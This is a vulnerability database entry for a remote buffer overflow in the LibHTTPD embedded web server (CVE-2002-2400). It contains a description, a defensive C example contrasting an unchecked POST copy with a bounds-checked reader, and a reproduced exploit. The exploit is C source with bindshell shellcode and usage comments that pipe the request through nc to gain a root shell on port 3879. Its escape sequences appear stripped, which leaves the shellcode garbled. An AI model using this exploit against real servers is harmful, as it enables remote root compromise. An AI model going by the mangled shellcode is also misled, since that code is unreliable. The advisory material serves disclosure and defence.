LibHTTPD POST远程缓冲区溢出漏洞

Vulnerability ID: 1107097    Vulnerability type: Buffer overflow
Published: 2002-11-13    Updated: 2002-12-31
CVE ID: CVE-2002-2400
CNNVD ID: CNNVD-200212-204
Platform: Linux    CVSS score: 10.0
|Sources
https://www.exploit-db.com/exploits/22016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-204
|Vulnerability details
LibHTTPD is a small web server library intended for embedded devices. LibHTTPD handles overly long POST requests incorrectly; a remote attacker can exploit this to trigger a buffer overflow in the LibHTTPD server and execute arbitrary instructions on the system with the privileges of the web process. Inspection of the 'api.c' source in the libhttpd.a library shows that the httpdProcessRequest() function at line 860 lacks proper checks on user-supplied input: an overly long POST request is copied without adequate bounds checking, causing a buffer overflow, and a carefully crafted request may allow arbitrary instructions to be executed with the privileges of the web process.
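The flaw described above is the classic unchecked copy of a client-controlled POST body into a fixed-size buffer. The C below is an added illustration, not LibHTTPD's own api.c code: the buffer size POST_BUF_SIZE, the function names and the status codes are all hypothetical. It places the unsafe pattern beside a checked reader that validates Content-Length before any copy and bounds the copy by the bytes actually received, and uses a constructed oversized body to show the request being refused instead of overrunning the buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size request buffer, standing in for the static
 * buffer that the advisory says the real code overruns. */
#define POST_BUF_SIZE 1024

/* Unsafe pattern (illustration only; never called here): the copy is
 * driven by the client-controlled body length, so a body longer than
 * POST_BUF_SIZE writes past the end of the static buffer. */
static char unsafe_post_buf[POST_BUF_SIZE];
void read_post_unsafe(const char *body, size_t body_len)
{
    memcpy(unsafe_post_buf, body, body_len);  /* no bounds check */
    unsafe_post_buf[body_len] = '\0';
}

/* Outcomes of the checked reader (hypothetical status codes). */
enum post_status {
    POST_OK = 0,
    POST_BAD_LENGTH = -1,   /* Content-Length missing, non-numeric or overflowing */
    POST_TOO_LARGE = -2,    /* declared length does not fit the buffer */
    POST_TRUNCATED = -3     /* fewer bytes received than declared */
};

/* Parse a Content-Length value as an unsigned decimal, rejecting signs,
 * whitespace, empty strings and values that would overflow size_t.
 * Returns 0 on success, -1 on failure. */
int parse_content_length(const char *value, size_t *out)
{
    if (value == NULL || *value == '\0')
        return -1;
    size_t n = 0;
    for (const char *p = value; *p != '\0'; p++) {
        if (*p < '0' || *p > '9')
            return -1;
        unsigned digit = (unsigned)(*p - '0');
        if (n > (SIZE_MAX - digit) / 10)
            return -1;                       /* n * 10 + digit would overflow */
        n = n * 10 + digit;
    }
    *out = n;
    return 0;
}

/* Checked reader: validate the declared length against the destination
 * before touching memory, and never copy more than was actually received. */
int read_post_checked(const char *content_length, const char *body,
                      size_t received, char *dst, size_t dst_size)
{
    size_t declared;
    if (parse_content_length(content_length, &declared) != 0)
        return POST_BAD_LENGTH;
    if (declared >= dst_size)                /* keep one byte for the NUL */
        return POST_TOO_LARGE;
    if (received < declared)
        return POST_TRUNCATED;
    memcpy(dst, body, declared);
    dst[declared] = '\0';
    return POST_OK;
}

/* A well-formed small body is accepted and copied intact. */
int demo_small_body(void)
{
    char buf[POST_BUF_SIZE];
    int st = read_post_checked("5", "hello", 5, buf, sizeof buf);
    if (st != POST_OK)
        return st;
    return strcmp(buf, "hello") == 0 ? POST_OK : -99;
}

/* A constructed oversized body (4096 bytes of 'S') is refused before
 * any copy happens, which is exactly what the unsafe reader fails to do. */
int demo_oversized_body(void)
{
    static char big[4096];
    memset(big, 'S', sizeof big);
    char buf[POST_BUF_SIZE];
    return read_post_checked("4096", big, sizeof big, buf, sizeof buf);
}

int main(void)
{
    printf("small body: %d (0 = accepted)\n", demo_small_body());
    printf("oversized body: %d (-2 = rejected as too large)\n", demo_oversized_body());
    return 0;
}
```

The two checks that matter are ordered deliberately: the declared length is compared against the destination size before any byte is copied, and the copy is additionally capped by the number of bytes actually read from the socket, so a client that declares a small length and then sends more, or declares more than it sends, cannot push the copy past either limit.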
|Exploit
source: http://www.securityfocus.com/bid/6172/info

LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code with super user privileges.

It should be noted that this vulnerability was reported in LibHTTPD v1.2. It is not yet known whether earlier versions are affected. 

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
        "2113451322262f2113201311211313C211]370C211]364K211M374215M"
        "3643152001311211E364Cf211]354f307E35617'211M360215E354211E"
        "370306E37420211320215M364315200211320CC315200211320C315"
        "2002113031311262?211320315200211320A31520035330^211u"
        "b1300210F07211Ef26013211363215Mb215Uf315200350343377"
        "377377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
        Debian Address? */
        fprintf(stdout,"20234404b");
    }
    fprintf(stdout,"rn");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
        fprintf(stdout,"S");
    }
    fprintf(stdout,"%srnx0xrnx82rnl0lrn",b1ndsh);
}
|References

Source: BID
Name: 6172
Link: http://www.securityfocus.com/bid/6172
Source: BUGTRAQ
Name: 20021124 LibHTTPD Vulnerability and fix
Link: http://archives.neohapsis.com/archives/bugtraq/2002-11/0305.html
Source: www.securiteam.com
Link: http://www.securiteam.com/unixfocus/6H00I2060I.html
Source: XF
Name: libhttpd-httpdprocessrequest-bo(10615)
Link: http://www.iss.net/security_center/static/10615.php
Source: BUGTRAQ
Name: 20021113 Remote Buffer Overflow vulnerability in LibHTTPd.
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=103720432411860&w=2
Source: NSFOCUS
Name: 3920
Link: http://www.nsfocus.net/vulndb/3920
